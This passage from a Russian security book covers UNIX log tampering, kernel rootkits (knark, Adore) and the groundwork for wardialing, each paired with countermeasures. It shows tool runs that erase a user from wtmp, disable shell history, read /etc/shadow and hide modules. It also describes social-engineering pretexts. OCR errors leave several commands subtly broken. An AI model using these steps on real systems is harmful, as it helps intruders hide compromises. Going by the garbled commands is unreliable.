    Конечно, при удалении следов своей деятельности первый шаг злоумышленника заключается в изменении системных журналов регистрации. Для определения соответствующей методики достаточно взглянуть на конфигурационный файл /etc/syslog.conf. Например, из показанного ниже файла syslog.conf видно, что большинство системных журналов регистрации находится в каталоге /var/log/.

    [quake]# cat /etc/syslog.conf
    # Регистрация всех консольных сообщений уровня ядра.
    # В процессе регистрации экран сильно
    засоряется избыточной информацией.
    #kern.* /dev/console
    # Регистрация всех сообщений
    (кроме почтовых) уровня info или выще.
    # Не пытайтесь регистрировать
    сообщения личной аутентификации!
    #.info;mail.none;authpriv.none /var/log/messages
    # Доступ к файлу authpriv ограничен.
    authpriv.* /var/log/secure
    # Регистрация всех почтовых сообщений в одном файле.
    mail.* /var/log/maillog
    # Everebody получает сообщения об опасности, плюс их регистрация
    # на другой машине.
    # . erne r g *
    # Сохранение сообщений об ошибках почты и новостей уровня err и выше
    # в специальном файле.
    uucp,news.crit /var/log/spooler

    Обладая этой информацией, злоумышленнику достаточно просмотреть содержимое каталога /var/log, чтобы найти в нем основные файлы журналов. Выведя на экран содержимое каталога, мы найдем в нем файлы журналов всех типов, включая сгоп, maillog, messages, spooler, secure (журналы TCP-оболочек), wtmp и xf erlog.
    Взломщику понадобится изменить много файлов, в том числе messages, secure, wtmp и xf erlog. Поскольку журнал wtmp имеет двоичный формат (и обычно используется только командой who), для его изменения взломщик, как правило, прибегнет к помощи одной из отмычек. Программа wzap предназначена специально для удаления из этого журнала информации о заданном пользователе. Для того чтобы воспользоваться этой программой, достаточно ввести, например, следующую команду.

    [quake]# who./wtmp
    joel ftpd!7264 Jul 1 12:09 (172.16.11.204)
    root ttyl Jul 4 22:21
    root ttyl Jul 9 19:45
    root ttyl Jul 9 19:57
    root ttyl Jul 9 21:48
    root ttyl Jul 9 21:53
    root ttyl Jul 9 22:45
    root ttyl Jul 10 12:24
    joel ttyl Jul 11 09:22
    stuman ttyl Jul 11 09:42
    root ttyl Jul 11 09:42
    root ttyl Jul 11 09:51
    root ttyl Jul 11 15:43
    joel ftpd841 Jul 11 22:51 (172.16.11.205)
    root ttyl Jul 14 10:05
    joel ftpd3137 Jul 15 08:27 (172.16.11.205)
    joel ftpd82 Jul 15 17:37 (172.16.11.205)
    joel ftpd945 Jul 17 19:14 (172.16.11.205)
    root ttyl Jul 24 22:14
    [quake]# /opt/wzap
    Enter username to zap from the wtmp: joel
    opening file...
    opening output file...
    working...
    [quake]# who ./wtmp.out
    root ttyl Jul 4 22:21
    root ttyl Jul 9 19:45
    root ttyl Jul 9 19:57
    root ttyl Jul 9 21:48
    root ttyl Jul 9 21:53
    root ttyl Jul 9 22:45
    root ttyl Jul 10 12:24
    stuman ttyl Jul 11 09:42
    root ttyl Jul 11 09:42
    root ttyl Jul 11 09:51
    root ttyl Jul 11 15:43
    root ttyl Jul 14 10:05
    root ttyl Jul 24 22:14
    root ttyl Jul 24 22:14

    Как видно из приведенного листинга, в новом журнале (файл wtmp.out) пользователь joel отсутствует. Теперь осталось скопировать файл wtmp.out поверх файла wtmp, и взломщик сможет скрыть факт своего присутствия в системе. Некоторые программы, такие как zap (для SunOS 4.x), на самом деле меняют лишь время последней регистрации в системе (эту информацию можно увидеть, например, обратившись с запросом finger и указав в качестве параметра имя интересующего вас пользователя). Теперь осталось вручную (точнее с помощью редактора, такого как vi или emacs) модифицировать файлы журналов secure, messages и xferlog, чтобы удалить последние следы своего пребывания в системе.
    Одним из последних этапов очистки журналов является удаление данных об использованных командах. Многие командные оболочки UNIX ведут журналы введенных ранее команд (history), что обеспечивает дополнительные удобства при повторном вводе команд. Например, оболочка BASH (Bourne again shell) (/bin/bash) сохраняет соответствующий файл в рабочем каталоге пользователя (во многих случаях и в каталоге пользователя root). Этот файл журнала, содержащий список недавно введенных команд, называется .bash_history. Обычно перед тем, как покинуть систему, злоумышленник очищает этот журнал. Например, в файле .bash_history может содержаться следующая информация.

    tail -f /var/log/messages
    vi chat-ppp0
    kill -.9 1521
    logout < здесь находятся записи о регистрации злоумышленника и начале его
    работы
    >
    id pwd
    cat /etc/shadow » /tmp/.badstuff/sh.log
    cat /etc/hosts » /tmp/.badstuff/ho.log
    cat /etc/groups » /tmp/.badstuff/gr.log
    netstat -na » /tmp/.badstuff/ns.log
    arp -a » /tmp/.badstuff/a.log
    /sbin/ifconfig » /tmp/.badstuff/if.log
    find / -name -type f -perm -4000 »
    /tmp/.badstuff/suid.log
    find / -name -type f -perm -2000 »
    /tmp/.badstuff/sgid.log

    Вооружившись простым текстовым редактором, взломщик может удалить все эти записи. Затем, воспользовавшись командой touch, он наверняка восстановит дату и время последнего доступа к файлу. Однако обычно взломщики отключают режим регистрации вводимых команд с использованием соответствующего режима командной оболочки.

    unset HISTFILE; unset SAVEHIST

    Кроме того, взломщик может создать ссылку .bash_history на файл /dev/null.

    [rumble]# In -s /dev/null ~/.bash_history
    [rumble]# Is -1 .bash_history
    Irwxrwxrwx 1 root root 9 Jul 26 22:59 .bash_history ->
    /dev/null

    Контрмеры: защита от очистки журналов



    Файлы журналов очень важно сохранять на таком носителе, на котором их трудно было бы модифицировать. К таким носителям, в частности, относятся файловые системы, поддерживающие расширенные атрибуты, такие как флаг "только для добавления" (append-only). Таким образом, в каждый файл журнала будет только дописываться новая информация, и злоумышленники не смогут ее изменить. Однако это вовсе не панацея, поскольку существует вероятность того, что при наличии времени, желания и соответст-вуюшего опыта злоумышленник сможет обойти этот механизм. Второй метод заключается в регистрации важных событий на защищенном узле. Одним из примеров реализации такого подхода является применение безопасной утилиты syslog компании Core Labs (http://www.core-sdi.com/english/freesoft.html). В этой утилите алгоритмы шифрования используются наряду с возможностью удаленной регистрации событий, что позволяет защитить самые важные журналы. Помните, что если злоумышленнику удалось проникнуть в вашу систему, то к имеющимся журналам нужно относиться с осторожностью, поскольку ему ничего не стоит их подделать.

    "Наборы отмычек" для модификации ядра



    В предыдущих разделах были рассмотрены традиционные "наборы отмычек", с помощью которых можно модифицировать определенные файлы взломанной системы, а затем разместить в ней программы типа "троянский конь". В настоящее время такие средства несколько устарели. Современные и гораздо более разрушительные варианты "наборов отмычек" могут функционировать на уровне самого ядра операционной системы. Такие "наборы отмычек" позволяют модифицировать выполняющееся ядро UNIX и, таким образом, вводить в заблуждение все системные программы без модификации самих программ.
    Обычно загружаемый модуль ядра (Loadable Kernel Module — LKM) служит для обеспечения дополнительной функциональности выполняющегося ядра без встраивания этих функций непосредственно в само ядро. Подобная возможность позволяет загружать и выгружать из оперативной памяти различные модули по необходимости, что, в свою очередь уменьшает размер выполняющейся части ядра. Таким образом, компактное ядро небольшого размера находится в оперативной памяти постоянно, а его возможности расширяются модулями, которые загружаются при необходимости. Это преимущество поддерживается многими версиями системы UNIX, в том числе Linux, FreeBSD и Solaris.
    Описанным механизмом может воспользоваться злоумышленник, в результате чего он сможет полностью манипулировать системой и всеми запущенными в ней процессами. Вместо того чтобы использовать модуль LKM для загрузки драйверов устройств, например сетевого адаптера, этот модуль может применяться для перехвата системных вызовов и их модификации с целью изменения реакции системы на определенные команды. Двумя наиболее популярными "наборами отмычек" является knark (для Linux) и SLKM (Solaris Loadable Kernel Module) компании ТHС (http://www.infowar.co.uk/thc/files/thc/ slkm-1.0. tar.gz). Мы подробно рассмотрим пакет knark (http: //packetstorm. securify.com/UNIX/penetration/rootkits/knark-0.59.tar.gz) ниже, а дополнительную информацию о "потайных ходах" ядра системы Solaris можно найти по адресу http://www.infowar.co.uk/the/files/the/slkm-1.0.html/.
    Пакет knark разработан хакером Кридом (Creed) и представляет собой "набор отмычек" для модификации ядра системы Linux 2.2.x. Самым важным компонентом этого пакета является модуль ядра knark. о. Для того чтобы загрузить этот модуль, нужно воспользоваться утилитой загрузки модуля ядра insmod.

    [shadow]# /sbin/insmod knark.о

    После этого на экране появится информация о загрузке модуля.

    [shadow]# /sbin/lsmod
    Module Size Used by
    knark 6936 0 (unused)
    nls_iso8859-l 2240 1 (autoclean)
    lockd 30344 1 (autociean)
    sunrpc 52132 1 (autociean) [lockd]
    rt!8139 11748 1 (autociean)

    Как видно из приведенного фрагмента, модуль ядра knark был успешно загружен. Кроме того, очевидно, что системному администратору не составит труда обнаружить этот модуль. Поэтому абсолютно закономерно, что взломщик захочет оставить свою деятельность незамеченной. Для того чтобы удалить данные о модуле knark из результатов, предоставляемых утилитой Ismod, злоумышленники могут воспользоваться модулем modhide.o (еще одним компонентом пакета knark)

    [shadow]#/sbin/insmod modhide.o
    modhide.o: init_module: Device or resource busy
    [shadow]# /sbin/lsmod
    Module Size Used by
    nls_iso8859-I 2240 1 (autociean)
    lockd 30344 1 (autociean)
    sunrpc 52132 1 (autociean) [lockd]
    rt!8139 11748 1 (autociean)

    Теперь, после повторного запуска утилиты Ismod, модуль knark таинственным образом "исчезнет" из поля зрения администратора.
    К другим интересным утилитам, входящим в состав пакета knark, относятся следующие.

    •  hidef. Используется для сокрытия файлов.
    •  unhidef. Служит для отображения скрытых файлов.
    •  ered. Применяется для настройки команды ехес, используемой для перенаправления ввода-вывода. Благодаря этому вместо исходных версий утилит могут выполняться программы типа "троянский конь".
    •  nethide. С помощью этой утилиты можно скрыть записи в файлах /proc/net./tcp и /proc/net/udp. Именно из этих файлов получает информацию утилита netstat. Указанные данные злоумышленник может использовать для сокрытия входящих/исходящих соединений взломанной системы.
    •  taskhack. Эта утилита позволяет изменить идентификаторы UID и GID запущенных процессов. Таким образом, взломщик в любой момент может изменить владельца процесса /bin/sh (выполняющегося с привилегиями обычного пользователя) и сделать его владельцем пользователя root (с UID 0).
    •  rехес. Эта утилита применяется для удаленного выполнения команд на сервере, на котором установлен пакет knark. Она обеспечивает возможность использования ложного исходного адреса, что позволяет выполнять команды без выявления их источника.
    •  rootme. Эта утилита позволяет получить доступ с привилегиями root без использования профамм SUID. Из приведенного ниже фрагмента видно, насколько просто это осуществить.

    [shadow]$ rootme /bin/sh
    rootme.с by Creed @ #hack.se 1999 creed@sekure.net
    Do you feel lucky today, haxOr?
    bash#

    Группа программистов и специалистов по вопросам безопасности Teso разработала еще один вариант ятра под названием Adore, который можно найти по адресу http://teso.scene, at/releases/adore-0 .14. tar. gz. По возможностям эта программа не уступает пакету knark. Ниже представлены некоторые параметры командной строки.

    [shadow]$ ava
    Использование: ./ava {h,u,r,i,v,0}
    [имя-файла, PID или dummy (для
    параметра 'U')]
    h скрыть файл
    u отобразить файл
    r выполнить с привилегиями root
    U удалить adore
    i сделать PID скрытым
    v сделать PID видимым

    Если приведенных выше сведений оказалось недостаточно, то прочитайте статью Сильвио Чезаре (Silvio Cesare), в которой рассматриваются аналогичные средства, позволяющие "на лету" модифицировать выполняющееся в оперативной памяти ядро в системах с "потайным ходом", в которых отсутствует поддержка модулей LK.M. Эту статью и описываемые в ней средства можно найти по адресу http://www.big.-net.au/~silvio/runtime-kernel-kmem-patching.txt. И наконец, Джоб Де Хаас (Job De Haas) выполнил огромную работу по исследованию методов взлома ядра системы Solaris. Часть написанного им кода можно найти по адресу http://www. itsx.com/kernmod-0.2.tar.gz.

    Контрмеры: защита от средств модификации ядра



    Как следует из приведенных сведений, "наборы отмычек" для модификации ядра могут оказаться чрезвычайно разрушительными и трудными для выявления. При этом в процессе обнаружения таких средств нельзя доверять ни одной программе и даже самому ядру. В случае взлома ядра окажутся бесполезными и утилиты подсчета контрольных сумм, такие как Tripwire. Одним из возможных способов обнаружения пакета knark заключается в использовании самого пакета. Поскольку с его помощью взломщик может скрыть любой процесс, воспользовавшись командой kill -31 и указав его идентификатор PID, ничто не мешает сделать любой процесс снова видимым. Для этого можно воспользоваться командой kill -32. Вот простой сценарий оболочки, который передает этот сигнал каждому процессу.

    # ! /bin/sh rm pid S=l
    while [ $S -It 10000 j do
    if kill -32 $S; then echo "$S" » pid
    fi S=expr $3+1'
    Done

    He забывайте о том, что kill -31 и kill -32 являются настраиваемыми командами пакета knark. Так что опытный взломщик может изменить эти параметры, чтобы избежать обнаружения своей деятельности. Однако вместе с тем вполне возможно, что другие злоумышленники воспользуются параметрами, заданными по умолчанию.
    В качестве самой лучшей контрмеры мы всегда рекомендуем предупреждение подобных нападений. Использование такой программы, как LIDS (Linux Intrusion Detection System — система выявления вторжений Linux), является наилучшей превентивной мерой в системе Linux. Ее можно получить по адресу www.lids.org. Программа LIDS предоставляет следующие возможности.

    •  Предотвращение модификации ядра.
    •  Предотвращение загрузки и выгрузки модулей ядра из оперативной памяти.
    •  Возможность использования расширенных атрибутов файлов immutable (постоянный) и append-only ("только для добавления").
    •  Блокирование совместно используемых сегментов памяти.
    •  Защита от манипулирования идентификаторами процессов (PID).
    •  Защита важных файлов в каталоге /dev/.
    •  Обнаружение попыток сканирования портов.

    Программа LIDS представляет собой модуль обновления ядра. Ее необходимо применять к существующему исходному коду ядра, который затем должен быть перестроен. После установки LIDS воспользуйтесь командой lidsadm, чтобы защитить ядро от возможных манипуляций с загружаемыми модулями. Вот что произойдет после установки программы LIDS, если попытаться запустить утилиту knark.

    [shadow]# insmod knark.о
    Command terminated on signal 1.

    После анализа файла журнала /var/log/messages становится очевидным, что программа LIDS позволяет не только выявить попытку загрузки модуля, но и практически их предотвращает.

    Jul 9 13:32:02 shadow kernel: LIDS:
    insmod (3 1 inode 58956) pid 700
    user (0/0)
    on ptsO: CAP_SYSjyiODULE violation:
    try to create module knark

    При использовании систем, отличных от Linux, нужно рассмотреть возможность отключения поддержки модулей LKM, что позволит обеспечить более высокий уровень безопасности. Конечно, подобный подход является не очень элегантным, однако он все же позволит предотвратить попытки применения описанных выше средств.


    13. Восстановление системы после использования "набора отмычек"



    Восстановление системы после использования "набора отмычек"


    Поскольку мы не можем предоставить исчерпывающее описание процедур выявления описанных вторжений, очень важно хотя бы упомянуть о различных мерах, к которым нужно прибегнуть в том случае, если прозвучит зловещий звонок. У вас может возникнуть вопрос: о каком звонке идет речь? Это может произойти примерно следующим образом. "Здравствуйте, я такой-то системный администратор. У меня имеются причины считать, что с ваших компьютеров предпринимаются попытки нападения на нашу сеть." "Этого не может быть, все выглядит абсолютно нормально", — отвечаете вы. Ваш собеседник говорит, что все проверит еще раз, а затем перезвонит еще раз. Так что у вас возникает специфическое ощущение, что позвонить мог лишь администратор, которым и была предпринята попытка взлома. Вам требуется определить, как и что произошло. Оставьте в стороне свое спокойствие и считайте, что любое выполняемое вами в системе действие может повлиять на возможность выявления вторжения. Даже при простом просмотре файла можно изменить время последнего доступа к нему. Для того чтобы не усугубить ситуацию случайными действиями, хорошо сразу же создать набор средств со статически скомпонованными двоичными файлами, а затем сравнить их с аналогичными файлами от поставщика программного обеспечения. Использовать статически скомпонованные двоичные файлы абсолютно необходимо, поскольку злоумышленники могли модифицировать совместно используемые файлы библиотек. Все эти действия должны быть выполнены до возникновения самого инцидента. Набор стандартных статически скомпонованных программ нужно поместить на гибкий диск или компакт-диск. В такой набор как минимум должны входить следующие утилиты.

    ls su dd
    ps login du
    netstat grep lsof
    w df top
    finger sh file

    Имея под рукой такой набор, очень важно сохранить три значения времени, связанных с каждым файлом системы UNIX. К таким значениям относится последнее время доступа, время последней модификации и время создания. Указанную информацию проще всего получить с использованием следующих команд, а затем сохранить полученные данные на гибком диске или другом внешнем носителе.

    Is -alRu > /floppy/timestamp_access.txt
    Is -alRc > /floppy/timestamp_modification.txt
    Is -alR > /floppy/timestamp_creation.txt

    Полученные результаты лучше всего просматривать автономно, без обращения к "подозрительной" системе. В большинстве случаев вы столкнетесь с "набором отмычек", который, возможно, был установлен с параметрами, заданными по умолчанию. В зависимости от установленного "набора отмычек" вы можете увидеть множество входящих в их состав утилит, сообщений о программах-анализаторах, содержащихся в файлах журналов, и т.д. Это позволит предположить, что вы имеет дело с "набором отмычек", не использующимся для модификации ядра. Все доказательства таких изменений основываются на получении надежных результатов при выполнении приведенных выше команд. При выполнении исследований в системе Linux воспользуйтесь безопасным загрузочным носителем, например с комплектом Trinux (http://www.trinux.org). Это позволит получить достаточно много информации, чтобы попытаться определить, была ли ваша система инфицирована "набором отмычек". Имея под рукой все собранные данные, обратитесь к следующим ресурсам, чтобы точно определить, что же все-таки изменилось в системе и каким образом был выполнен взлом. Очень важно собрать данные о том, какие именно команды запускались и какие при этом результаты были получены.
    Кроме того, очень важно иметь под рукой и хороший план комплексных исследований еще до того момента, как произошло вторжение. He становитесь одним из многих администраторов, которые после обнаружения подобных прецедентов сразу же обращаются к властным структурам. Между этими двумя событиями имеется еще много промежуточных шагов.


    14. Резюме



    Резюме


    Как мы увидели из нашего исследования, UNIX — это сложная система, для адекватной защиты которой необходимо предпринимать целый ряд комплексных мероприятий. Мощь и элегантность UNIX обеспечивают ее популярность, однако они же являются и причиной ее уязвимости. Мириады методов удаленного и локального взлома позволяют злоумышленникам нарушать подсистему безопасности даже самых защищенных систем UNIX. Чуть ли не ежедневно обнаруживаются новые методы взлома путем переполнения буфера. Программисты мало задумываются о безопасности, а средства обнаружения несанкционированных действий устаревают практически в течение нескольких недель. Между хакерами и администраторами идет не прекращающаяся ни на минуту битва, в которой одни попытаются приблизить, а вторые — отдалить "день зеро". В табл. 8.3 приведен перечень дополнительных ресурсов, которые могут помочь вам обрести душевный покой (во всяком случае, на некоторое время).

    Таблица 8.3. Дополнительные ресурсы безопасности системы UNIX

    Название
    Операционная система
    Адрес
    Описание
    Titan
    Solaris
    http://www.fish.com/titan/
    Набор программ, призванных укрепить безопасность Solaris
    Solaris Security FAQ
    Solaris
    http://www.sunworld.com/ sunworldonline/ common/security-faq.html
    Руководство, в котором содержится информация о том, как заблокировать систему Solaris от вторжений взломщиков
    Armoring Solaris
    Solaris
    http://www.enteract.com/ -1spitz /armoring.html
    Статья о том, как укрепить безопасность системы Solaris. Данная статья представляет систематический подход к подготовке установки брандмауэра. Здесь же приводится загружаемый сценарий, который поможет укрепить подсистему защиты
    NIS+ part 1 : What's in a Name (Service)?, Peter Galvin
    Solaris
    http ://www . sunworld.com/ sunworldonline/swol -09-1996/swol-09-security.html
    Прекрасный обзор средств обеспечения безопасности NISi-
    FreeBSD Security How-To
    FreeBSD
    http ://www. freebsd.org/~ j kb/howto .html
    Несмотря на то что данное руководство ориентировано на FreeBSD, большую часть материала можно применять и к другим ОС UNIX (особенно OpenBSD и NetBSD)
    Linux Administrator's Security Guide (LASG), Kurt Seifried
    Linux
    https: //www. seifried.org/ lasg/
    Одна из лучших статей по защите системы Linux
    HP-UX Security
    HP-UX
    http: //wwwinfо.cern.ch/dis/   security/hpsec.html
    Рекомендации по защите HP-UX
    Watching Your Logs, Lance Spitzner
    Все версии
    http ://www.enterac .com/ ~1spitz /swatch.html
    Информация о том, как спланировать и реализовать автоматический фильтр для контроля системных журналов. Включены примеры конфигурирования и реализации
    UNIX Computer Security Checklist (версия 1.1)
    Все версии
    ftp ://ftp. auscert.org.au/ pub/auscert/papers/unix_ security_checklist
    Удобный вопросник по безопасности UNIX
    The Unix Secure Programming FAQ, Peter Galvin
    Все версии
    http : //www . sunworld . com/ sunworldonline/swol-08-1998/ swol-08-sacurity.html
    Советы по проектированию систем защиты, методам программирования и тестирования
    CERT Intruder Detection Checklist
    Все версии
    ftp://info.cert.org/pub/ tech_tips/intruder_detect ion_checklist
    Руководство по поиску признаков, которые указывают на возможные недостатки системы безопасности


    Глава 9. Уязвимость удаленных соединений, РВХ, Voicemail и виртуальных частных сетей



    Глава 9. УЯЗВИМОСТЬ УДАЛЕННЫХ СОЕДИНЕНИЙ, РВХ, VOICEMAIL И ВИРТУАЛЬНЫХ ЧАСТНЫХ СЕТЕЙ




    1. Уязвимость удаленных соединений, PBX, VOICEMAIL и виртуальных частных сетей



    Уязвимость удаленных соединений, PBX, VOICEMAIL и виртуальных частных сетей


    Обычно организации меньше всего внимания уделяют старым забытым телефонным линиям. Эти провода, опоясавшие весь мир, сегодня преданы забвению. В этой главе будет показано, как старенький модем с пропускной способностью 9600 Кбит в секунду может поставить на колени сетевого Голиафа с мошной системной защитой.
    Может показаться, что авторы решили начать главу, посвященную сетевым атакам, с устаревшей информации о хакинге аналоговых удаленных соединений. Несмотря на повсеместное распространение Internet, обычные телефонные сети PSTN (Public Switched Telephone Network) сегодня достаточно часто используются для связи с домашними и даже служебными компьютерами. Поэтому сенсационные истории о взломе узлов Internet меркнут перед более прозаическими рассказами о вторжениях через удаленные соединения, поскольку последние являются более разрушительными и проще выполнимыми.
    На самом деле для больших компаний гораздо большую опасность представляют плохо инвентаризованные модемные линии, чем защищенные брандмауэрами шлюзы Internet. Упомянутый выше эксперт в области безопасности компании AT&T Билл Чесвик (Bill Cheswick) охарактеризовал брандмауэр как панцирь черепахи. На самом деле, зачем атаковать неприступный брандмауэр, когда можно пробраться непосредственно к "телу" целевой системы через плохо защищенный сервер удаленного доступа? Пожалуй, защита удаленных соединений — наиболее важный аспект построения линии круговой обороны.
    Хакинг удаленных соединений выполняется по классической схеме: сначала выполняется предварительный сбор информации, затем — сканирование, инвентаризация и, наконец, атака. В большинстве случаев этот процесс можно автоматизировать с помощью традиционных хакерских средств, получивших название сканеров телефонных номеров (demon dialer) или программ автопрозвона (wardialer). По существу, эти средства программно устанавливают удаленное соединение с большим количеством телефонных номеров, регистрируют те из них, по которым устанавливаются модемные соединения, пытаются идентифицировать систему на другом конце телефонной линии и по возможности зарегистрироваться в системе, подобрав имя пользователя и пароль. Если для этого требуется специальное программное обеспечение или конкретные знания о системе, установка соединения может выполняться вручную.
    Выбор сканера телефонных номеров — камень преткновения как для злоумышленников, так и для легальных специалистов по поиску незащищенных удаленных соединений. В этой главе мы рассмотрим две наиболее популярные программы такого типа, которые можно бесплатно загрузить из Internet (ToneLoc и THC-Scan), а также коммерческий продукт PhoneSweep от компании Sandstorm Enterprises.
    После обсуждения этих программ будут рассмотрены приемы, применяемые против обнаруженных сканерами телефонных номеров систем вручную или в автоматическом режиме, в том числе внутренние телефонные сети компаний (сети РВХ) или системы голосовой почты (voicemail).
    В завершение мы коснемся другого аспекта систем удаленного доступа и опишем виртуальные частные сети VPN (Virtual Private Networking). Хотя такие сети являются достаточно защищенными и на них возлагаются основные надежды в области развития корпоративных сетей, вопрос безопасности для них — не праздный. К настоящему времени известен лишь один случай взлома таких сетей, который и будет рассмотрен в этой главе наряду с общими рассуждениями о перспективах этой жизненно важной технологии.

    Предварительный сбор данных о телефонных номерах



    Хакинг удаленных соединений начинается с определения диапазона телефонных номеров, с которыми будет работать сканер. Настоящие хакеры обычно выбирают компанию-жертву и собирают информацию об используемых ею телефонных номерах из самых разных источников. Ниже будут описаны некоторые механизмы для ограничения сферы распространения такой информации.
    В первую очередь хакеры изучают телефонные справочники. Многие компании продают компакт-диски с телефонными справочниками, которыми можно воспользоваться для взлома удаленных соединений. Определив основной телефонный номер, взломщики обычно "исследуют" схожие с ним номера. Например, если известно, что основной номер компании Acme Corp. — 555-555-1212, то для сканера телефонных номеров хакер задаст диапазон 555-555-ХХХХ, чтобы проверить все 10000 похожих телефонных номеров. При наличии нескольких модемов такое количество номеров можно перепробовать за несколько дней с помощью почти любой программы-сканера.
    Еще один способ получения информации о телефонных номерах — позвонить на местную АТС и попытаться узнать номера "из первых уст" неосмотрительных служащих. Это хороший способ получения неафишируемых номеров, применяемых для удаленных соединений и центров данных, в которых префикс обычно отличается от префикса основного телефонного номера. Многие телефонные компании по требованию клиента заносят эту информацию в разряд секретной и не разглашают ее без предоставления пароля, однако известно множество случаев нарушения таких договоренностей и разглашения информации.
    Помимо телефонных справочников, источником подобных сведений являются Web-узлы корпорации. Многие компании, потеряв бдительность от свободы распространения информации в Internet, публикуют списки своих телефонных номеров на Web-узлах. Этого не стоит делать, если только это не обусловлено характером деятельности.
    Телефонные номера можно найти в самых неожиданных местах Internet. Одно из наиболее опасных местоположений в смысле накопления информации уже упоминалось в главе 1, однако стоит вернуться к нему еще раз. Сведения о контактных телефонах, а также другую техническую и административную информацию о компаниях, представленных в Internet, можно получить из регистрационной базы данных имен Internet, поддерживаемой центром InterNIC (известной также как Network Solutions), через интерфейс whois по адресу http://www.networksolutions.com/cgi-bin/whois/whois/. Вот результат поиска по ключевому слову acme. com, содержащий как открытую, так и закрытую информацию из базы данных InterNIC.

    Registrant: Acme, Incorporated (ACME-DOM)
    Princeton Rd. Hightstown, NJ 08520
    US Domain Name: ACME.COM
    Administrative Contact: Smith,John (JSOOOO) jsmith@ACME.COM
    555-555-5555 (FAX) 555-555-5556
    Technical Contact, Zone Contact: ANS Hostmaster (AH-ORG)
    hostmaster@ANS.NET
    (800)555-5555

    Теперь хакеры имеют не только хорошую отправную точку для работы сканера телефонных номеров, но и кандидатуру сотрудника (John Smith) под именем которого можно осуществлять свою деятельность по сбору дополнительной информации. Помимо этого некоторую полезную информацию можно почерпнуть из раздела технических контактов. А именно здесь видно, как информация фиксируется в базе данных InterNIC. Это уже кое-что.
    И наконец, если вручную набирать подряд любые телефонные номера, то рано или поздно можно услышать: "Корпорация XYZ слушает". Это конечно достаточно утомительный способ предварительного сбора данных, но в то же время очень эффективный. Еще одним слабым звеном в системе телекоммуникации компании являются автоответчики, которые можно использовать против служащих компании. Например, от имени вице-президента компании по вопросам маркетинга можно оставить следующее сообщение системному администратору: "Привет, это Джим. Срочно измени мой пароль".

    Устраните утечку информации



    Лучшей защитой против предварительного сбора информации по телефону является предотвращение утечки информации. Конечно же, для обеспечения возможности деловых контактов необходимо раздавать телефонные номера компании, но очень осторожно. Свяжитесь со своим оператором и согласуйте с ним перечень открытых телефонных номеров, список лиц, имеющих доступ к закрытой информации, а также пароль для получения каких-либо закрытых данных. Организуйте группу по устранению утечки информации из числа сотрудников отдела информатизации, которая будет следить за тем, чтобы закрытые телефонные номера не распространялись через Web-узлы, службы каталогов, серверы удаленного доступа и т.д. Свяжитесь с компанией InterNIC и "почистите" контактную информацию для зоны Internet. И наконец, предупредите пользователей, что телефон не всегда друг, поэтому нужно быть проявлять осторожность в разговорах с незнакомцами и не разглашать никакую закрытую информацию.

    Сканеры телефонных номеров



    Процесс подбора телефонных номеров во многом определяется используемыми для этого средствами. Поэтому далее будут охарактеризованы конкретные продукты, такие как ToneLoc, THC-Scan и PhoneSweep, Однако сначала приведем некоторые общие рассуждения.

    Аппаратные средства



    При подборе телефонных номеров вопрос выбора аппаратных средств не менее важен, чем выбор программного обеспечения. Ниже мы рассмотрим два бесплатных программных средства, предназначенных для операционной системы DOS и снискавших незаслуженную репутацию трудно настраиваемых. Однако для настройки любой программы автопрозвона требуется тонкое знание СОМ-портов компьютера, а на некоторых аппаратных конфигурациях эти программы могут не работать вообще, например на переносном компьютере с интерфейсом PCMCIA. Конечно же, не стоит переоценивать требования к аппаратным средствам: типичный персональный компьютер с двумя стандартными СОМ-портами и последовательной платой для добавления еще двух вполне подойдет для этих целей. В то же время, для профессиональной системы автопрозвона можно установить многопортовую карту Digitboard, позволяющую подключить к системе от 4 до 8 модемов одновременно.
    Аппаратные средства — главный фактор, определяющий скорость и эффективность. Сканеры телефонных номеров могут быть излишне осторожными: зачастую перед набором следующего номера они выдерживают паузу в несколько секунд, чтобы не упустить потенциальную цель из-за помех на линии или других факторов. Если период ожидания составляет 45-60 секунд, то программа автопрозвона на каждый звонок тратит примерно минуту. Путем несложных арифметических вычислений можно определить, что для проверки диапазона в 10000 номеров одному модему понадобится семь полных суток. Очевидно, что добавление каждого нового модема существенно ускоряет процесс — четыре модема работают вдвое быстрее, чем два. Поскольку подбор номеров можно выполнять только в непиковое время (см. следующий раздел), то чем больше модемов задействовано в этой операции — тем лучше.
    Значительное влияние на скорость процесса оказывает также тип модема. Современные модемы, как правило, голосовые. Определение голоса позволяет при подборе номера сразу же зарегистрировать номер телефона как "голосовой", отключиться и продолжать дозвон по следующему номеру, не ожидая истечения заданного интервала времени (45-60 секунд). Поскольку значительная доля телефонных номеров выделена для голосовых линий, то их обнаружение значительно ускоряет процесс подбора номера телефона для модемных соединений. В документации к обеим программам THC-Scan и PhoneSweep рекомендуется использовать модем USR Courier, как наиболее надежный. Кроме того, в документации по THC-Scan рекомендуется также использовать модем Zyxel Elite, а в документации по PhoneSweep — Zyxel U-1496E fax/Voice.

    Легализация деятельности



    Наряду с вопросами выбора аппаратной платформы для подбора номеров потенциальные взломщики серьезно рассматривают вопросы законности своей деятельности. В некоторых странах запрещено последовательно набирать большое число номеров, и телефонные компании внимательно следят за соблюдением этого требования, а зачастую их оборудование попросту не позволяет этого делать. Конечно же, все рассматриваемые здесь программы разбивают заданный диапазон номеров на случайные интервалы, чтобы избежать нарушения таких требований, но это все же не гарантирует от попадания в "черный список". Поэтому специалисты, занимающиеся подобной деятельностью на законных основаниях, должны легализовать свои действия и получить письменное разрешение от компании-заказчика на проведение такого тестирования. В этом документе необходимо указать диапазон сканируемых телефонных номеров, чтобы возложить ответственность за выход из диапазона на выполняющую подбор номера организацию.
    В соглашении необходимо также указать время суток, когда компания-заказчик предпочитает выполнять тестирование. Как уже упоминалось, сканирование телефонных номеров в рабочее время может негативно отразиться на эффективности работы компании, поэтому такую деятельность обычно откладывают на поздний вечер или ночное время.

    Помните, что сканирование телефонных номеров с включенным идентификатором CallerlD, означающим возможность автоматического определения номера, равнозначно передаче визитной карточки по каждому из набираемых вами номеров. Многократное повторение звонков из одного источника вызовет подозрение у целевой компании, поэтому стоит отключить режим автоматического определения номера на своей телефонной линии (конечно же, если у вас есть разрешение на подобную деятельность, то это не критично). Не следует забывать и том, что при звонках по номерам с префиксом 800 номер звонившего фиксируется в любом случае независимо от статуса CallerlD, поскольку в этой ситуации разговор оплачивается отвечающей стороной.

    Стоимость телефонных переговоров



    И наконец, не забывайте о том, что подбор номеров удаленных целевых организаций оплачивается по междугородному тарифу телефонных переговоров. Поэтому приготовьтесь к получению значительных счетов за телефонные переговоры и заранее согласуйте вопрос их оплаты с заказчиком.
